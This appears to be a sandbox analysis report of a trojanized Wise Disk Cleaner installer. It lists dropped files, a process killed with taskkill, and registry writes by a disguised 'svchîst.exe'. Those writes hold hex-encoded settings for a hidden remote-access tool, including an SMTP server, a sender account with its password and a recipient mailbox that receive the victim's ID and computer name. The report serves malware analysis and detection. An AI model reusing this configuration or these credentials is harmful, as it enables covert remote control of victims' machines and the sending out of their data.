| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-322D1.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9LRK6.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-V5A52.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JEUB2.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3GB98.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2K8S9.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FTJ4K.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-L99TI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8U5IC.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N3GO7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AHPA0.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PMEAD.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FFP72.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-HS1UP.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-ACAMM.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-O517D.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1J6R4.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J4T27.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OIF4T.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OQ2IF.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\notification = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c646e735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223639313130223e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e66616c73653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f646e735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600390031003100300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3